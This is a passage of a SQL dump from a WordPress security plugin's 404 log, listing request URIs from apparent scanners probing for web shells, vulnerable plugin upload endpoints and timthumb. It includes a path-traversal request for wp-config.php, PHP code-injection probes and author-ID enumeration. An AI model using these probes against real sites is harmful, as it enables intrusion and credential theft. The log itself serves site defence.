(0x58186e805359ec5f42c51c0be5d3a2e9, 1486483948, '/wp-content/plugins/wp-vertical-gallery/js/swfupload/js/upload.php'),
(0x942423a011ee0e7a91db70099d20a09a, 1486483948, '/wp-content/plugins/wp-yasslideshow/js/swfupload/js/upload.php'),
(0xe52da7ef8c5f5e30c568f3b7c7e6608f, 1486678914, '/wp-content/plugins/wp-royal-gallery/js/swfupload/js/upload.php'),
(0x6de03d677d7f97abede5ea0153ee366d, 1486678914, '/wp-content/plugins/uploader/uploadify/uploadify.css'),
(0xaed9db6f87c5f6e2bd0da15a75352013, 1486757889, '/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/ajaxupload.js'),
(0x70a925687357e0ca3fa52b1f2c81dd8a, 1486794928, '/cpanel.php'),
(0x52654cf01cbadbe639ef402e6c82ae24, 1486794931, '/bubu.php'),
(0xd9858d4b4e9ac85b3d222629f05bd75c, 1486794942, '/,.php'),
(0xa16de2574ff69e691eee2d750921a708, 1486794950, '/..php'),
(0x4ff0a4c17b1c50a25cc863c42e69e353, 1486794958, '/pcodvi.php?yt=phpinfo%28%29;'),
(0x1ae8890ebc1a873bcf561312d15418e8, 1486794968, '/2.php'),
(0x2b6958d223011b99369eebafd256a4cb, 1486794970, '/2.php.suspected'),
(0x16f2b0ce50be33e455de5a53abd5528c, 1486794988, '/3.php.suspected'),
(0x097b0f306d38b4916bdec86335c828b6, 1486794991, '/4.php'),
(0x6708a32084cd25d86ae3b9a8f8dbbc10, 1486794993, '/4.php.suspected'),
(0xb9624ac2be37d1b0a14f293646ffba4e, 1486794996, '/5.php'),
(0x916aa9ff4aa729a08fa26bf4a4fbff53, 1486794999, '/5.php.suspected'),
(0x6adaad85001be75a3d9735556af31b69, 1486795017, '/6.php.suspected'),
(0x816310845277501345206258db89116f, 1486795023, '/7.php'),
(0xec70558209150ef130a60b6f929c9926, 1486795027, '/7.php.suspected'),
(0xe081a4d06fe146604c59359c750f3cd7, 1486795038, '/8.php'),
(0xeb3b7ba85ae1a1503c14fdea35c53a92, 1486795053, '/9.php'),
(0x9c08d3139884596e262564117d58a680, 1486844927, '/wp-content/plugins/insert-php/readme.txt'),
(0xed755941b61a6503378fa110b5414de3, 1486853894, '/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'),
(0x3d1741e19222085abe2c9735449691d6, 1486922546, '/wp-content/plugins/revslider/temp/update_extract/Uploader.php'),
(0x69e5d9a97668fc10da76274ab9ec2033, 1486922547, '/wp-content/plugins/showbiz/temp/update_extract/Uploader.php'),
(0x3fca95e3aa547006fb4847993645a727, 1486985115, '/hello-world/wp-login.php'),
(0x5c82fcd36f4d8f1b2e307e33986c3553, 1487116285, '/wp-content/plugins/placester/js/uploadify/uploadify.css'),
(0xec1eb721a55e59185ac53ea004f96d71, 1487116285, '/wp-content/plugins/nmedia-user-file-uploader/nm_fileuploader_style.css'),
(0x650e7e400b37ec9d23dd52f06f7e5e8b, 1487206751, '/wp-content/plugins/nmedia-user-file-uploader-pro-v5/nm_fileuploader_style.css'),
(0x153c3e3390ae29f56adf63a0e58750e1, 1487290327, '/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php'),
(0x85ee09edc3692f6983fb761f4d2613c6, 1487290331, '/wp-content/plugins/comment-extra-field/readme.txt'),
(0x996e75c8102865e89ea9f5444b93f6d8, 1487319319, '/wp-content/themes/dance-studio/css/jquery-ui.css'),
(0x43e547bda81a71b3abd6a2944379f327, 1487321072, '/Marvins.php'),
(0x0e0973d66e906210c7c5fa43cecc334e, 1487327714, '/wp-content/plugins/stats-wp/readme.txt'),
(0xd8a6df850d00df8e1b63b1ebb2f22324, 1487514262, '/wp-content/uploads/index.php'),
(0x57c3915bdc47385c71ab48aaff0d9926, 1487514287, '/pols.php'),
(0xb8bf930d1a07e0668c8f3f34c4167737, 1487514353, '/wp-admin/includes/rnnvhs.php'),
(0x52aacf84dfd8ff220c56afa3036057f9, 1487514419, '/wp-includes/images/media/rss.php'),
(0xa03a91ccdb805e1f3c0692d9e005044a, 1487514702, '/wp-sbb.php'),
(0xe8f9bcae5f6a9c2cd9314e41216aa6d1, 1487514785, '/wp-admin/includes/wp-cods.php'),
(0x05ca6ab16f97e13e87ec264da6c37ba9, 1487514992, '/upgrade.php'),
(0x791d0ab2596106b36b82f77025a6978a, 1487515062, '/wp-admin/theme-uploader.php'),
(0xc15b535a725c7378198e1d400ea46905, 1487515071, '/wp-admin/plugin-uploader.php'),
(0xcf1fbfc4eac3696e57a6494510692cbe, 1487515081, '/random.php'),
(0xaf09594a8b3b45d23f7d851b7e4118c0, 1487586514, '/wp-content/themes/pro-hosting/wp-search.php'),
(0xb2b9850644486e68ac3ce89b9d0bb4e3, 1487587093, '/plugins/system/anticopy/anticopy.php'),
(0xf476f9edd731274be7832eab76e1f03b, 1487587109, '/mssqli.php'),
(0xf4c5ce17c03f28b5765d79afaaf93c5a, 1487587980, '/modules/mod_ariimageslidersa/mod_ariimageslidersa.php'),
(0x350728f46e06229f9559368f6154ac6e, 1487588311, '/main_.php'),
(0x5038fda0f38aa948d21e8f939ee98f3d, 1487589001, '/wp-content/themes/vmag/wp-search.php'),
(0xd9a366e4a1dde8a0189e91a0131dc3d0, 1487590180, '/wp-content/themes/twentyseventeen/wp-search.php'),
(0xe0ad8ef6331e79608687da4e4b0afa8f, 1487590248, '/wp-content/themes/dshopping/wp-search.php'),
(0x25dace8bbbaf8dc3c2fc2952648871f0, 1487591221, '/alfa.php'),
(0xe72bda044214317d87926ae4c6c06f0b, 1487592997, '/modules/mod_stat/mod_stat.php'),
(0x8aae49654929f1c5d7d3bf58eb71540a, 1487616099, '/wp-content/plugins/pica-photo-gallery/css/style.css'),
(0xd8fb819b85dbc5614e4e84874827345a, 1487616099, '/wp-content/plugins/annonces/admin/theme.php'),
(0x4fa105af8aed7c1a88291dced7d5ef86, 1487671884, '/wp-content/hfilter.php'),
(0x0c653db20ca5a6cc62d419a91facec5b, 1487672063, '/hfilter.php'),
(0x6104487ac5ce82d85393ff7f69bb4876, 1487720339, '/wp-content/plugins/web-tripwire/readme.txt'),
(0x77cbf0f92ff32e8d4e9631451f5f22ff, 1487721918, '/wp-content/plugins/image-symlinks/uploadify/uploadify.css'),
(0xbcc826b180e9cbf068a6591c939e662a, 1487721922, '/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js'),
(0x9a5bd13dc5441aa3ea44e2f670a81bf8, 1487755773, '/wp-content/plugins/cherry-plugin/admin/import-export/wp-xml.php'),
(0xb098b797d1f74e4fae98481126a43753, 1487787987, '/?author=30'),
(0xb0e32b39bad26383513d15ea6edaa212, 1487787988, '/?author=31'),
(0x5e56e4c1ff608dacd9ef2423d8914074, 1487787988, '/?author=32'),
(0xd14e1d4c8529d84b54e6541a70a3f199, 1487787989, '/?author=33'),
(0x611e6b4ff2f3cdf7eda454d3f5a3485a, 1487787989, '/?author=34'),
(0x2d89cdeda16d54ce9780111312e85390, 1487787990, '/?author=35'),
(0x887f535eabf327f02fa4853fac2b0cc1, 1487787990, '/?author=36'),
(0x6b0f0edb11901a72320758dafe911e38, 1487787990, '/?author=37'),
(0x72e5047245a44ba11bb14496cea13c8c, 1487787991, '/?author=38'),
(0xd3f7f6d10897a0ab30e7f9fa6b8c3753, 1487787991, '/?author=39'),
(0x36cf21924a6b7c36cc4f62153e1e05dd, 1487787992, '/?author=40'),
(0x48313ff2538edc3becc555ccb0341339, 1487787992, '/?author=41'),
(0x0db4a3b42339fa125799a25852051ae9, 1487787992, '/?author=42'),
(0x3d761ed433c77b07952e18159f7be5ba, 1487787993, '/?author=43'),
(0xb04d829212c7f938a39b85fb5364e7d2, 1487787993, '/?author=44'),
(0x6e14eefc9419107c65f1a456211fbe7d, 1487787994, '/?author=45'),
(0x73c44d8fa4d7132aa7f28715a9adea0c, 1487787994, '/?author=46'),
(0xa2447f5cfa7640ae53c232a204dd1bc2, 1487787995, '/?author=47'),
(0x327b90efa28355e717d3ecdbf0ed8cd5, 1487787995, '/?author=48'),
(0x4710db1bc29df6e5cad18423b6a4fca9, 1487787995, '/?author=49'),
(0x859352b99b561de86612d207b017170d, 1487909273, '/wp-includes/logo_img.php'),
(0x32c35bbf953bd2db128cfc17c1719f7c, 1487911182, '/wp-content/plugins/sam-pro-free/js/sam.pro.dialog.js'),
(0x93a0cde26fa5af7afb28cffdad200439, 1488187603, '/wp-content/plugins/gallery-slider/readme.txt'),
(0xc30a73e3207c2cbdbeb6225153edd2ef, 1488199640, '/wp-content/logo_img.php'),
(0x36457a0d9fcf094500232e2cd096a400, 1488225888, '/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php'),
(0x654c45dcfa0e81cee6b9201f19e0be90, 1488380493, '/wp-content/uploads/wp-config-sample.php'),
(0x64e419d0f41b8ec2c79c68f84bb7ed8a, 1488392734, '/administrator/'),
(0xac7e07e5708cb7f45562a73d852cf224, 1488424662, '/wp-content/plugins/sexy-contact-form/includes/fileupload/'),
(0xb6f5484e01c7fab7178b25366ed63d68, 1488450232, '/wp-content/uploads/wp-error.php'),
(0xf49c4e9465afb509cf8660d92d1c5924, 1488469706, '/wp-copv/hook-filters.php'),
(0x4889dba6afc899e3703dbc71eb8008af, 1488485764, '/wp-content/uploads/wp-security.php'),
(0xe3a02c2fe6babb6c1bc682c01a4e4231, 1488513022, '/wp-content/plugins/wp-mailinglist/css/colorbox.css'),
(0x9c7dceb9809724759bb0bb375c1b89d1, 1488525813, '/wp-admin/css/uploader.php'),
(0x1e439756383afecb82b6cf22b6a0312b, 1488534953, '/wp-content/plugins/smart-videos/readme.txt'),
(0xd10c6c3d1a4b39d453df9e8726f38e39, 1488538308, '/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae'),
(0x748f8fd174d78bbe2aab456c145a3264, 1488547213, '/wp-content/plugins/zen-mobile-app-native/readme.txt'),
(0xf2e6dd7bba4bf1ddc6583baf5e570614, 1488582268, '/wp-honor.php'),
(0xfb81ea45cb680e646858560ecf49b38c, 1488582366, '/wp-includes/class.wp-times.php'),
(0x08f49f3b9b75306c31073a935a72aa41, 1488582888, '/wp-admin/network/rnnvhs.php'),
(0xbaf43e6b7f5c5a862e99f02a9c674289, 1488582895, '/wp-content/uploads/rnnvhs.php'),
(0x85b2d361c62726ada6808f1a8ed83e69, 1488582901, '/rnnvhs.php'),
(0x40634c6f450717f0526e1ff7e3583eaf, 1488582908, '/wp-content/plugins/rnnvhs.php'),
(0xa8b5d6312f97856bb0c7ce483af26a98, 1488582912, '/wp-admin/user/fronqx.php'),
(0x7fcbe97ce18ef6e58a2ca8c27faa0ccf, 1488586509, '/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css'),
(0x7095becabb8f0e3e3b3045a2f28fa013, 1488594745, '/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php'),
(0x9a5ffc36e90f848a6172e628d0d8801c, 1488602468, '/wp-404.php'),
(0x97bb080f65d98d9fc03f2460ca9cb4c2, 1488620427, '/wp-content/plugins/woocommerce-products-filter/readme.txt'),
(0x30d359cee225d16109054447275483c5, 1488686582, '/wp-content/plugins/wp-handy-lightbox/readme.txt'),
(0x65aa109420bfd908eb458e51ac9982c9, 1488785858, '/wp-ver2.php'),
(0x441a2b60625702fe94ecd86caaebf979, 1488850869, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/README.md'),
(0x8d32cfdf5a7db8bb0ee1f74521362602, 1488850869, '/wp-content/plugins/image-store/_css/admin.css'),
(0x7e403f3d698a9d205bd45b78ecb9dab2, 1488864212, '/modules/modules/modules.php'),
(0xa24e355ba779220966cdc1fa942ed1d9, 1488880256, '/sample.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7'),
(0x4ff7d3d908815508cecd9b192768cdc3, 1488883253, '/wp-check.php?z=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7'),
(0x71b963cdfe157c572175de18baf00a24, 1488886559, '/wp-content/plugins/error-log.php'),
(0x66d9819e16277ae598f2efcacdbb063c, 1488886641, '/wp-includes/error-log.php'),
(0x0f6532f2cf478c3e967bca6c0c399118, 1488886823, '/error-log.php'),
(0x1d95c3888093a7338bbf2dbf21884e3b, 1488894110, '/defautls.php?test=1111'),
(0x9d14ab24c983228a5efa041e6e80c931, 1488894463, '/wp-includes/class.wp-times.php?test=1111'),
(0xb5a772d7a9459a2ebc9fd1c09d7144d2, 1488902178, '/wp-content/plugins/cms-commander-client/index.html'),
(0x94ab41c9267feb30b14856e4301c9d49, 1488981972, '/wp-content/plugins/mailchimp-integration/readme.txt'),
(0xd4079db90206205c1f59c0bc6b6bd030, 1488982133, '/wp-content/plugins/seo-rotator-for-images/readme.txt'),
(0x408303003fbe495478b109cbd39dcab4, 1489076173, '/wp-content/uploads/wysija/themes/wolf/herewgo.php'),
(0xa86885fce9aa48e5a413e975e510cc0a, 1489076174, '/wolf.php'),
(0xe4484824b3d737327764d83e18f4a770, 1489076174, '///?gf_page=upload'),
(0x6950a8876618052cbfb2052ce4fd9f52, 1489088754, '/wp-content/plugins/fluid_forms/file-upload/server/php/'),
(0xd181cd0fe62d64f7a003ccf9e2af6e09, 1489153522, '/wp-content/o4.php'),
(0x744dbb0acebc7f9d505961693931c928, 1489153917, '/wp-content/uploads/db_1.php'),
(0xd03b0be1aad791eecde5142dde40a5b9, 1489155140, '/wp-content/functions-admin.php'),
(0x24927ea01692714fd33eaff54f8bec4a, 1489183882, '/wp-json/wp/v2/users/'),
(0x012fccd8a44da69252f13d7e511c5b47, 1489196662, '/wp-content/plugins/arcadepress/gpl.txt'),
(0xce1e3ce09e0598ecb756a003ad039ca0, 1489253212, '/assets/global/plugins/jquery-file-upload/server/php/'),
(0xc7d3f5f4160e16bbc7b3d1cb9851ec96, 1489327912, '/wp-content/uploads/2013/11/nouvelles-seances-ct.png'),
(0xb8099fe350efed2cf6b2beeadd94a241, 1489344932, '//?gf_page=upload'),
(0x5aca41baccbd3a9b42a34dd792de24af, 1489368717, '/wp-content/plugins/ads-widget/readme.txt'),
(0xa64a44f81cc57765e1df5744bc23e257, 1489398834, '/confg.php'),
(0x63c32b84df63eb509083f2e0d212df89, 1489398836, '/confg.php.suspected'),
(0x31f7ff587f0852e5ca8c47bca65c0f4b, 1489398845, '/htaccess.php'),
(0x02d1117e022a43db121064b923525310, 1489398848, '/htaccess.php.suspected'),
(0x48659ab17ab035fd4de5e17c7df68f01, 1489398850, '/b37.php'),
(0x2ecf33bf3dcd4dd6679f74067f0c984f, 1489398852, '/b37.php.suspected'),
(0xb23184e9d07e9bf909b00b46b8949662, 1489398859, '/xx.php'),
(0x11a20f2279b9b3ccd9ddfe3f2176611c, 1489398863, '/un.php'),
(0xe5066e0549b1b390b93164ff559cdb6b, 1489398865, '/misc/img.php'),
(0x76d2255031da2009d430a3a042312552, 1489398868, '/contact.php'),
(0x2bb90ef93aab0bed4d8a953cfe5218a4, 1489398871, '/contact.php.suspected'),
(0x9feee3f74f2fac59d4b75ebadd3e8275, 1489398876, '/a.php'),
(0x7ddb0a31e4a98a0c6436120585c4b7b3, 1489398878, '/index-WP.php'),
(0x50ff7517cab6b419c894f04df888f0a4, 1489398882, '/index-OLD.php'),
(0x2b59a561c8588caa75885175a690f23f, 1489398889, '/Afras.php'),
(0x92c7b43dbb8468834df781719c2b88c9, 1489398891, '/webinfo.php'),
(0xa5966a2625fc2f2d5977999bb2225d5d, 1489398894, '/joz.php'),
(0x771eb26b79a14a375d826cf6f558dbe9, 1489432704, '/wp-content/themes/gaukingo/db.php'),
(0x27076d353dcb5edebe9a6e8c64aa3f04, 1489434722, '/reade.php'),
(0x343196b39b44c171ded30cd5cac9147d, 1489434883, '/trackback.php'),
(0x3362156c3214d23b3de88958572889d7, 1489435093, '/wp-sonde.php'),
(0x1da1f23ee100e7b2cfff5c0ac22a8131, 1489435307, '/revslider.php'),
(0xf97f9d5bca75e65254b1b66306a5c51c, 1489435686, '/LICENSE.php'),
(0xebd85de10aa5b44883d34788ac437d51, 1489440096, '/wp-content/plugins/downloads-manager/readme.txt'),
(0x2e250ddb83f5e8820092f990ab5877a2, 1489494887, '/wp-content/common.php.suspected'),
(0xcc3a2359d5d8627f31d4d846664cc765, 1489500200, '/wp-content/plugins/wp-popup/readme.txt'),
(0x788dc69b1a0a38d93ce0f20ee09694d1, 1489522107, '/wp-admin/user/user-add.php'),
(0xd025b2186b777c00faa4171e6f2082c8, 1489522107, '/wp-admin/images/logo_img.php'),
(0xc0b33d8ff55bbe6bcb4f0de8b91fe4b2, 1489522107, '/wp-admin/edit-media.php'),
(0x21a0bbc312a8d0394f254cbba0fbb044, 1489522108, '/wp-admin/image-true.php'),
(0x555f057542b144bc4848568ddf2b6fe2, 1489522193, '/wp-content/uploads/2016/02/backup.php'),
(0x2e377288d509ca10abe96bf611367d18, 1489522193, '/wp-content/plugins/contact-form-7/images/update.php'),
(0x4c71046bdd841658ec0b8efc3512fa44, 1489522193, '/wp-includes/Text/logo_img.php'),
(0x784227275f4d24703f2f789fdb17f126, 1489522193, '/wp-content/themes/twentytwelve/system.php'),
(0xcbbb3e3182c8bd970e1c1f9ff6ab54bf, 1489522193, '/wp-includes/pomo/logo_img.php'),
(0xbc6647803ec1a2e68b4b5b51907c186f, 1489522193, '/wp-includes/SimplePie/logo_img.php'),
(0x555b564fadd74ae8b4fb744189d957bb, 1489522214, '/wp-includes/theme-compat/logo_img.php'),
(0xc107c13cf9b0c8ea5ebc4e9fa17f3a87, 1489554151, '/contactys'),
(0x847b2684104095597d8432c814d8639a, 1489643870, '/wp-content/plugins/mobile-app-builder-by-wappress/readme.txt'),
(0x280309f4748263f8fe8e24792f6411ec, 1489646329, '/pomo.php'),
(0xeb4237e1eb72752399c2e464cae5c94b, 1489646368, '/locoy.php'),
(0xd8e149cf94c6d34c48f2c52a9e432640, 1489646495, '/AKaWn7.php'),
(0x6c0251fd37ab8efa3a5db44ebbaf2e13, 1489646778, '/extracts.php'),
(0x690ec7731509c70a8c159e949ed76f05, 1489646888, '/configurationbak.php'),
(0x90be9eb1943ab3e1cb7566e839ab356c, 1489646976, '/wp-code.php'),
(0x07af3d9e443407a4ce59a4ee3aab3fcb, 1489647074, '/wp-cods.php'),
(0x606673b8d594d392549215e0c5dd8394, 1489647275, '/indes.php'),
(0x4daff0615ac20d98a9b6eade8989fbf8, 1489647427, '/wp-tmp.php'),
(0x7213b66d3d809c182d705d1704b2485e, 1489647530, '/4Rc43a.php'),
(0x2ee41b7ac447aad22ec390b27f67da79, 1489647728, '/apache_pd2.php'),
(0xe40259f0bd1e9e5ccbb1c332dbf09c00, 1489647786, '/wp-upgrade.php'),
(0xe15c0c3847664321fe87f58b2b50f24e, 1489710910, '/wp-content/plugins/gravityforms/css/admin.css'),
(0x27524048c282ec08d01870251bbf5968, 1489793895, '/wp-content/plugins/php-event-calendar/css/uploadify.css'),
(0x22f1ae86cd9300cdbd67995c5cbb44a4, 1489793899, '/wp-content/plugins/php-event-calendar/readme.txt'),
(0xde1ced4a85b1299d59a6880804288e89, 1489818821, '/language/en-GB/language/en-GB/en-GB.xml'),
(0x5e953706fa7dc563749586cb81035e3a, 1489936170, '/wp-content/plugins/wp-editor/readme.txt'),
(0x6c762931f3b62c61bfddba4b6561f13a, 1489936171, '/wp-content/plugins/zingiri-web-shop/admin.css'),
(0x8d1307ba1412feadf93d651d1e547cd8, 1489936172, '/wp-content/plugins/auto-attachments/a-a.css'),
(0x2f4155b8afef250dfea0ea91f3939a6a, 1489936172, '/wp-content/plugins/front-end-upload/destination.php'),
(0x7a86128caa8d7923e8e379dc453e1577, 1489936172, '/wp-content/plugins/fcchat/default.png'),
(0x22c8d2c2c052cd644fdfcc9684f34444, 1489936172, '/wp-content/plugins/mac-dock-gallery/bugslist.txt'),
(0x9c3bcbe0984f6cd9d87cbd5c71bc069a, 1489936173, '/wp-content/plugins/resume-submissions-job-postings/installer.php'),
(0x7d980bbb2845ee269784c8f71a771450, 1489936174, '/wp-content/plugins/user-meta/readme.txt'),
(0xe04ef9dfff312bc90708a7d264da1500, 1489936174, '/wp-content/plugins/font-uploader/font-uploader-free.php'),
(0x2b45f66437e20d234bab3b9665b024a7, 1489936175, '/wp-content/plugins/wp-homepage-slideshow/functions.php'),
(0xb563fb5e35b82305d2db4d4744ad391e, 1489936175, '/wp-content/plugins/user-photo/admin.css'),
(0xec29c10017e5afc8d44d4d2e2e09dc3e, 1489936175, '/wp-content/plugins/wp-property/action_hooks.php'),
(0xcc1d76c9c8438fd831a15ae3b9754672, 1489936176, '/wp-content/plugins/custom-content-type-manager/index.html'),
(0xe2e1f270678dfcd3155900addd974267, 1489936176, '/wp-content/plugins/wpstorecart/lgpl.txt'),
(0x6ad10c167dc256cf34663fd7ee5b8194, 1489936177, '/wp-content/plugins/nmedia-user-file-uploader/readme.txt'),
(0x332d30c3d80e4c6916db5e22a28bed1b, 1489936177, '/wp-content/plugins/simple-dropbox-upload-form/'),
(0xf9f3b17015c8f13da420534b39eb6dd2, 1489936177, '/wp-content/plugins/wp-image-news-slider/functions.php'),
(0x5f915841ed0ee106e673e676882c1960, 1489936178, '/wp-content/plugins/wp-filemanager/fm.php'),
(0x7e35863d20dc76321006a7055301be97, 1489936178, '/wp-content/plugins/ckeditor-for-wordpress/ckeditor.config.js'),
(0x529ac9c8715ef85610fc4e9e08d23556, 1489936178, '/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po'),
(0xec6ecbc4c5888c81158fbffe08abacb9, 1489936179, '/wp-content/plugins/gallery-plugin/gallery-plugin.php'),
(0xd1f4bbff45f56f935005f1cf54af0001, 1489936179, '/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt'),
(0x7a3353cf70fd762186b697b6686552bd, 1489936179, '/wp-content/plugins/ninja-forms/ninja_forms.php'),
(0xc087d0b0bfab9923fc61d252e03d28b6, 1489936179, '/wp-content/plugins/wp-e-commerce/license.txt'),
(0x11d7c546c5fb8a51642f36cc12469139, 1489936181, '/wp-content/plugins/magic-fields/MF_Constant.php'),
(0x4673f19efdb557e01800672672ec887d, 1489936181, '/wp-content/plugins/nextgen-gallery/changelog.txt'),
(0x545f2d59275c010aae10c778645b1107, 1489936182, '/wp-content/plugins/user-avatar/readme.txt'),
(0x29c502984819af49ae9652772651a49b, 1489936643, '/wp-content/plugins/category-grid-view-gallery/cat_grid.php'),
(0x9331c6c2303d4ab0722f20602de197cb, 1489939903, '/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt'),
(0x0fda3f5d337483433062c20038fe02cb, 1489951831, '/contactsf9'),
(0x3b7b451e5a6d226b8e5d623d8912b131, 1490013531, '/wp-conf.php'),
(0xeacf4a0a5b9a8817337300c213b2d263, 1490052348, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/'),
(0x78335ffeb12ce016b1da78aba262a8d6, 1490056124, '/wp-content/themes/headway-16/style.css'),
(0xf8d4747f0a4025640853c988594e2d94, 1490108441, '/wp-content/logo_img.php.suspected'),
(0x237886752f427b871ccd9879fbaa0949, 1490142467, '/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css'),
(0x8b48c6c3477e0249bf04a970191e09bf, 1490196571, '/wp-admin/logo_img.php.suspected'),
(0x559b9f4829e51ba3a67f72725f847c4e, 1490245253, '/default.php'),
(0x2d952d75f54a8b07c616da5d8ce789c2, 1490245257, '/wp-content/plugins/revslider/css/tipsy.css'),
(0xc73bd256ad99bf503caab6dd2443b3c6, 1490278975, '/wp-includes/logo_img.php.suspected'),
(0xbe4fc7f11ffe73c19e648ae25b72e5a1, 1490377863, '/sites/all/themes/hatch/templates/search.php'),
(0xb5ec1a0b06e39ec97f79c166b0ab7ad3, 1490379002, '/system/logs/include20.php'),
(0x2957bfc5b0854d45facf24eb126a1649, 1490379096, '/admin/language/english/total/search.php'),
(0x7d87b5118e13d84ef0e26e81cf0fba5f, 1490384829, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css'),
(0x27a74125d2ee62711619d82e104ffb5d, 1490384832, '/wp-content/uploads/2015/09/new_up.php'),
(0x79c4b117ac096c4de3ae7a999d273294, 1490398183, '/wp-content/uploads/wpcf7_captcha/1625059663.png'),
(0xc8da6ff1a20755b08ff0d9387f126a7c, 1490459760, '/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/readme.txt'),
(0x67318653d9fae599ff3756dff7557c08, 1490501299, '/wp-content/uploads/2015/10/new_up.php'),
(0x5e1e72ee1519fc1946f5143cb6021de2, 1490575146, '/wp-content/plugins/buddypress-media/readme.txt'),
(0x98d08b7386e8b9b0a69c5e63e5ebf0a6, 1490669271, '/wp-content/plugins/revslider/images/tipsy.gif'),
(0x3f4c3b438a92a010a2e0dd917d010cb2, 1490669273, '/media/mass.php'),
(0x21ce8e4b16bedfe1225fa4982b8cb8f4, 1490691497, '/wp-content/uploads/2015/11/new_up.php'),
(0xc462f2856134e8912553755038555400, 1490691497, '/wp-content/uploads/2015/12/new_up.php'),
(0xfe80f613cdd588f09f2e3e809159e77f, 1490755262, '/wp-content/plugins/analytic/readme.txt'),
(0xf895b7f9c041cf1e811f96968733f9e4, 1490761924, '/wp-copv/css.php'),
(0x4f06f88139539cf1a3af0254ebaadfae, 1490772894, '/wp-admin/includes/images.php?x=1'),
(0x182e5298d2d3084bd8ed711967bc5962, 1490788354, '/wp-includes/Text/Tiff.php?x=1'),
(0xa4926c45222b36f20f4f8f6f9bde7d7f, 1490810324, '/wp-kidmx.php?script=1'),
(0xbf3260013a5839aece3b8935ae7b09d3, 1490827747, '/wp-print.php?script=1'),
(0x8dcdcc14daa0236c0f842591a998f754, 1490834657, '/wp-content/uploads/2015/08/new_up.php'),
(0x7f4791832e3614e71acc4af39dffadda, 1490834659, '/wp-content/uploads/2015/07/new_up.php'),
(0xa3ee897f696a17106abe39c7376d216d, 1490845456, '/missok.php?x=1'),
(0x22a5a013d01a43eb110ed75cadbd606b, 1490887057, '/wp-includes/pomo/so.php?x=1'),
(0xfcdc9157f5965b3a07b44dbcf5319830, 1490888204, '/wp-content/plugins/analytics-counter/class.wpadm-ga.php'),
(0x5272c17798f7e33c07064d3a5038357d, 1490909243, '/wp-includse.php?script=1'),
(0x0ffa6bc7bf9c082a16a796ad3ad72d01, 1490926421, '/Martina.php'),
(0xdbcf5a77e9e7e91cfb713130fc1f3d34, 1490928120, '/component/users/?view=login'),
(0x62cef20926cce88ddb954da8820dca0e, 1490940349, '/wp-content/uploads/2015/06/new_up.php'),
(0xe6cc4009b190365f0c04cd014c39150c, 1490943767, '/db_z.php');
INSERT INTO `wp_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x0d9b8331c83e4e5faf1371eb481e4eb9, 1490961555, '/kup.php?u=1'),
(0x674a085cfe36ffdf6b1091fd15f6ae85, 1490979097, '/Tobey.php'),
(0xe9d1b03d2627635e58b27422b99feb38, 1490994895, '/cachee.php'),
(0xbdf4a7c1edd5b3626fd8d41644dcde14, 1491010868, '/wp-profi1e.php?x=1'),
(0xe6c216cb6c91df9ecddd884ce191d628, 1491015627, '/wp-includes/wp-inc.php'),
(0xc8c14930a0461c6fe6940389edc7e3da, 1491042937, '/license.php?x=1'),
(0xbe53dc78965b90219d3bdc77fd627bb4, 1491052746, '/wp-includes/images/hon2our.php'),
(0xeaa71f9350ce8c8dfca8423eb1c2d58f, 1491092287, '/wp-content/uploads/2016/01/new_up.php'),
(0x70cd38b6c42da899dea152ba42fe8e85, 1491092287, '/wp-content/uploads/2016/02/new_up.php'),
(0x63223907e0dfaf3febf99e89d00ac316, 1491273398, '/yt.php'),
(0xc0bf28acf41fd07561a425a996dc519e, 1491304279, '/inedx.php'),
(0xd8caf03914e841e1257e52f29cb03739, 1491345959, '/wp-conet.php'),
(0x625830d1d89bd72ca4a5dfaf58b7b9f3, 1491423791, '/wp-content/themes/theagency/includes/uploadify/uploadify.php'),
(0x71cc8ab2947703e5c15b3cf064060e7a, 1491478482, '/log.php'),
(0xf607bc69819739672adc9c387eb221d5, 1491481337, '/wp-content/plugins/dropbox-backup/template/js/admin-wpadm.js'),
(0x0dc14974e3f286878c783909fc5e34ec, 1491541106, '/wp-admin/admin-center.php'),
(0xa116a8a9336b50c1359765265eba690b, 1491555141, '/wp-includes/xmlparser.php'),
(0x9d28cc027a5196966316154926a513de, 1491555141, '/akism.php'),
(0xf11fc530d14db31c59d46d96b755ab3c, 1491859741, '/version.php'),
(0xf1e73fe98c020b1333a617ce4df52643, 1491859755, '/admin/language/english/total/arhive.php'),
(0x5ffd0df2039a4ce321f4f1e5a77cd745, 1491859962, '/cmsbuild.php'),
(0x99ad528b9817658a05e35864c71e05ff, 1491860469, '/media/version.php'),
(0xbe8d2c155b968104fc082ba624be9cd7, 1491860548, '/wp-api.php'),
(0xeb15089c7f0bc4da79ba3efade7910c6, 1491860962, '/wp-content/uploads/cmsbuild.php'),
(0xbfb9034daf632bf572d27cd02183e2b7, 1491861124, '/mod_ariimageslidersa.php'),
(0x4f11ab347d61d4c7a9d2b2999452c7e5, 1491861402, '/assets/images/version.php'),
(0xeab84d49868512c401ae77c6217f999a, 1492293799, '/wp-green.php'),
(0xb2ce75883b838b7d6ff467e69380aae9, 1492566349, '/wp-content/themes/brochure-melbourne/includes/timthumb.php'),
(0x5b6b548905081df7e3f8153d7478afbf, 1492566349, '/wp-content/plugins/wp-mobile-detector/timthumb.php'),
